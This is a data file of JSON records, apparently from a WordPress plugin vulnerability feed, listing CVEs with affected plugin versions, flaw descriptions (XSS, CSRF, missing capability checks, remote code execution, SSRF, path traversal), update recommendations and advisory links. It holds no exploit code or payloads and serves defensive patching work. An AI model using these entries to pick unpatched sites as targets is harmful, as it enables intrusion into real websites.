version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L245\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L245\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L254\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/custom-facebook-feed\\\/tags\\\/4.3.0\\\/assets\\\/js\\\/cff-scripts.js#L254\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec3de7e2-4a29-401f-af2c-0ce78d768eae?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec3de7e2-4a29-401f-af2c-0ce78d768eae?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6696","slug":"popup-builder","versionImpact":"4.3.1","versionEndExcluding":"4.3.2","description":"The Popup Builder \u2013 Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on several functions in all versions up to, and including, 4.3.1. While some functions contain a nonce check, the nonce can be obtained from the profile page of a logged-in user. This allows subscribers to perform several actions including deleting subscribers and perform blind Server-Side Request Forgery.","recommendation":"Update to version 4.3.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86ec30-7a9d-4c36-8559-bde331c8b958?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f86ec30-7a9d-4c36-8559-bde331c8b958?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/tags\\\/4.2.3\\\/com\\\/classes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/popup-builder\\\/tags\\\/4.2.3\\\/com\\\/classes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096000\\\/popup-builder\\\/trunk\\\/com\\\/classes\\\/Ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096000\\\/popup-builder\\\/trunk\\\/com\\\/classes\\\/Ajax.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12532","slug":"bwd-elementor-addons","versionImpact":"4.3.18","versionEndExcluding":"4.3.19","description":"The BWD Elementor Addons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.3.18 in widgets\/bwdeb-content-switcher.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 4.3.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211460\\\/bwd-elementor-addons\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211460\\\/bwd-elementor-addons\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bdf6a52-7316-440b-9d36-d405a672dce1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8bdf6a52-7316-440b-9d36-d405a672dce1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36831","slug":"social-networks-auto-poster-facebook-twitter-g","versionImpact":"4.3.17","versionEndExcluding":"4.3.18","description":"The NextScripts: Social Networks Auto-Poster plugin for WordPress is vulnerable to authorization bypass due to missing capability checks on multiple user privilege\/security functions provided in versions up to, and including 4.3.17. This makes it possible for low-privileged attackers, like subscribers, to perform restricted actions that would be otherwise locked to a administrative-level user.","recommendation":"Update to version 4.3.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3709465d-6d67-45bd-abb9-4875065b8129?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3709465d-6d67-45bd-abb9-4875065b8129?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.sucuri.net\\\/2020\\\/09\\\/insufficient-privilege-validation-in-nextscripts-social-networks-auto-poster.html\",\"name\":\"https:\\\/\\\/blog.sucuri.net\\\/2020\\\/09\\\/insufficient-privilege-validation-in-nextscripts-social-networks-auto-poster.html\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0641578b-16b9-4d79-af69-b4886840da36\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0641578b-16b9-4d79-af69-b4886840da36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-nextscripts-social-networks-auto-poster-security-bypass-4-3-17\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-nextscripts-social-networks-auto-poster-security-bypass-4-3-17\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4571","slug":"give","versionImpact":"4.3.0","versionEndExcluding":"4.3.1","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized view and modification of data due to an insufficient capability check on the permissionsCheck functions in all versions up to, and including, 4.3.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to view or delete fundraising campaigns, view donors' data, modify campaign events, etc.","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/Endpoint.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/Endpoint.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/GetLogs.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/API\\\/Endpoints\\\/Logs\\\/GetLogs.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/DeleteCampaignListTable.php#L40\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/DeleteCampaignListTable.php#L40\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/GetCampaignsListTable.php#L95\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Campaigns\\\/ListTable\\\/Routes\\\/GetCampaignsListTable.php#L95\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/Endpoint.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/Endpoint.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/ListDonors.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/Donors\\\/Endpoints\\\/ListDonors.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L36\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/tags\\\/4.2.0\\\/src\\\/EventTickets\\\/Routes\\\/UpdateEvent.php#L36\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305112\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3305112\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f03b4ef-e877-430e-a440-3af0feca818c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f03b4ef-e877-430e-a440-3af0feca818c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5201","slug":"thesis-openhook","versionImpact":"4.3.0","versionEndExcluding":"4.3.1","description":"The OpenHook plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 4.3.0 via the 'php' shortcode. This allows authenticated attackers with subscriber-level permissions or above, to execute code on the server. This requires the [php] shortcode setting to be enabled on the vulnerable site.","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.1\\\/inc\\\/shortcodes.php?rev=2972840#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.1\\\/inc\\\/shortcodes.php?rev=2972840#L24\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37b9ed0e-5af2-47c1-b2da-8d103e4c31bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37b9ed0e-5af2-47c1-b2da-8d103e4c31bf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.0\\\/inc\\\/shortcodes.php#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/thesis-openhook\\\/tags\\\/4.3.0\\\/inc\\\/shortcodes.php#L28\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5151","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ede4c66-9932-4ba6-bba1-0ba13f5a2f8f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1ede4c66-9932-4ba6-bba1-0ba13f5a2f8f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5034","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f3a3b5-07bf-4cb3-b358-8488808733e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/31f3a3b5-07bf-4cb3-b358-8488808733e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5033","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd42765a-1300-453f-9835-6e646c87e496\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/dd42765a-1300-453f-9835-6e646c87e496\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5032","slug":"sully","versionImpact":"4.3","versionEndExcluding":"4.3.1","description":"The SULly WordPress plugin before 4.3.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","recommendation":"Update to version 4.3.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bb92693-23b3-4250-baee-af38b7e615e0\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4bb92693-23b3-4250-baee-af38b7e615e0\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4086","slug":"enhanced-tooltipglossary","versionImpact":"4.2.11","versionEndExcluding":"4.3.0","description":"The CM Tooltip Glossary \u2013 Powerful Glossary Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.11. This is due to missing or incorrect nonce validation when saving settings. This makes it possible for unauthenticated attackers to change the plugin's settings or reset them via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3e2ddde-1421-4352-b93a-1492574f624e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f3e2ddde-1421-4352-b93a-1492574f624e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076616\\\/enhanced-tooltipglossary\\\/trunk\\\/settings\\\/CMTT_Settings.php?contextall=1&old=3029791&old_path=%2Fenhanced-tooltipglossary%2Ftrunk%2Fsettings%2FCMTT_Settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3076616\\\/enhanced-tooltipglossary\\\/trunk\\\/settings\\\/CMTT_Settings.php?contextall=1&old=3029791&old_path=%2Fenhanced-tooltipglossary%2Ftrunk%2Fsettings%2FCMTT_Settings.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2506","slug":"popup-builder","versionImpact":"4.2.7","versionEndExcluding":"4.3.0","description":"The Popup Builder \u2013 Create highly converting, mobile friendly marketing popups. plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom JS functionality in all versions up to, and including, 4.2.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804a973e-4650-428c-910f-09e4fc3aa4bb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/804a973e-4650-428c-910f-09e4fc3aa4bb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085485%40popup-builder&new=3085485%40popup-builder&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3085485%40popup-builder&new=3085485%40popup-builder&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0268","slug":"mega-addons-for-visual-composer","versionEndExcluding":"4.3.0","description":"The Mega Addons For WPBakery Page Builder WordPress plugin before 4.3.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99389641-ad1e-45c1-a42f-2a010ee22d76\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/99389641-ad1e-45c1-a42f-2a010ee22d76\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0958","slug":"ultimate-auction","versionImpact":"4.2.9","versionEndExcluding":"4.3.0","description":"The Ultimate WordPress Auction Plugin plugin for WordPress is vulnerable to unauthorized access to functionality in all versions up to, and including, 4.2.9. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary auctions, posts as well as pages and allows them to execute other actions related to auction handling.","recommendation":"Update to version 4.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ajax-actions\\\/send-private-msg.php#L35\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ajax-actions\\\/send-private-msg.php#L35\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L219\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L219\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L274\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php#L274\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242416\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3242416\\\/ultimate-auction\\\/trunk\\\/ultimate-auction.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af3675c9-3a6b-4139-85e8-2fc57f290e82?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af3675c9-3a6b-4139-85e8-2fc57f290e82?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4214","slug":"apppresser","versionImpact":"4.2.5","versionEndExcluding":"4.3.0","description":"The AppPresser plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 4.2.5. This is due to the plugin generating too weak a reset code, and the code used to reset the password has no attempt or time limit.","recommendation":"Update to version 4.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c44c36a-c4c7-49c2-b750-1589e7840dde?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4c44c36a-c4c7-49c2-b750-1589e7840dde?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_WPAPI_Mods.php#L567\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_WPAPI_Mods.php#L567\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997160\\\/apppresser\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2997160\\\/apppresser\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_API_Limit.php?rev=2997182\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/apppresser\\\/trunk\\\/inc\\\/AppPresser_API_Limit.php?rev=2997182\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0448","slug":"wp-helper-lite","versionEndExcluding":"4.3","description":"The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5945","slug":"wp-svg-images","versionImpact":"4.2","versionEndExcluding":"4.3","description":"The WP SVG Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018type\u2019 parameter in all versions up to, and including, 4.2 due to insufficient input sanitization. This makes it possible for authenticated attackers, with Author-level access and above, who have permissions to upload sanitized files, to bypass SVG sanitization and inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/389d96e9-1fad-49a6-89b6-8f7f108d8117?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/389d96e9-1fad-49a6-89b6-8f7f108d8117?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L111\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L111\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L313\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-svg-images\\\/trunk\\\/wp-svg-images.php#L313\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105276\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105276\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1435","slug":"ajax-search-pro","versionEndExcluding":"4.26.2","description":"The Ajax Search Pro WordPress plugin before 4.26.2 does not sanitise and escape various parameters before outputting them back in pages, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ca62908-4ef5-41e0-9223-f77ad2c333d7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0ca62908-4ef5-41e0-9223-f77ad2c333d7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13494","slug":"wp-file-upload","versionImpact":"4.25.2","versionEndExcluding":"4.25.3","description":"The WordPress File Upload plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.25.2. This is due to missing or incorrect nonce validation on the 'wfu_file_details' function. This makes it possible for unauthenticated attackers to modify user data details associated with uploaded files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.25.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241028\\\/wp-file-upload\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3241028\\\/wp-file-upload\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595a6ab3-0731-4ef4-a385-5dfebbd917f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/595a6ab3-0731-4ef4-a385-5dfebbd917f4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11613","slug":"wp-file-upload","versionImpact":"4.24.15","versionEndExcluding":"4.25.0","description":"The WordPress File Upload plugin for WordPress is vulnerable to Remote Code Execution, Arbitrary File Read, and Arbitrary File Deletion in all versions up to, and including, 4.24.15 via the 'wfu_file_downloader.php' file. This is due to lack of proper sanitization of the 'source' parameter and allowing a user-defined directory path. This makes it possible for unauthenticated attackers to execute code on the server.","recommendation":"Update to version 4.25.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/wp-file-upload\\\/trunk\\\/wfu_file_downloader.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31052fe6-a0ae-4502-b2d2-dbc3b3bf672f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31052fe6-a0ae-4502-b2d2-dbc3b3bf672f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12719","slug":"wp-file-upload","versionImpact":"4.24.15","versionEndExcluding":"4.25.0","description":"The WordPress File Upload plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'wfu_ajax_action_read_subfolders' function in all versions up to, and including, 4.24.15. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform limited path traversal to view directories and subdirectories in WordPress. Files cannot be viewed.","recommendation":"Update to version 4.25.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/trunk\\\/lib\\\/wfu_ajaxactions.php#L849\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-file-upload\\\/trunk\\\/lib\\\/wfu_ajaxactions.php#L849\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3217005\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314ae0f5-8a4e-4bf3-9fc9-49f5b036b99e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/314ae0f5-8a4e-4bf3-9fc9-49f5b036b99e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-39639","slug":"wp-file-upload","versionImpact":"4.24.7","versionEndExcluding":"4.24.8","description":"Broken Access Control vulnerability in Nickolas Bossinas WordPress File Upload allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects WordPress File Upload: from n\/a through 4.24.7.","recommendation":"Update to version 4.24.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-file-upload\\\/wordpress-wordpress-file-upload-plugin-4-24-7-broken-access-control-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/wp-file-upload\\\/wordpress-wordpress-file-upload-plugin-4-24-7-broken-access-control-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
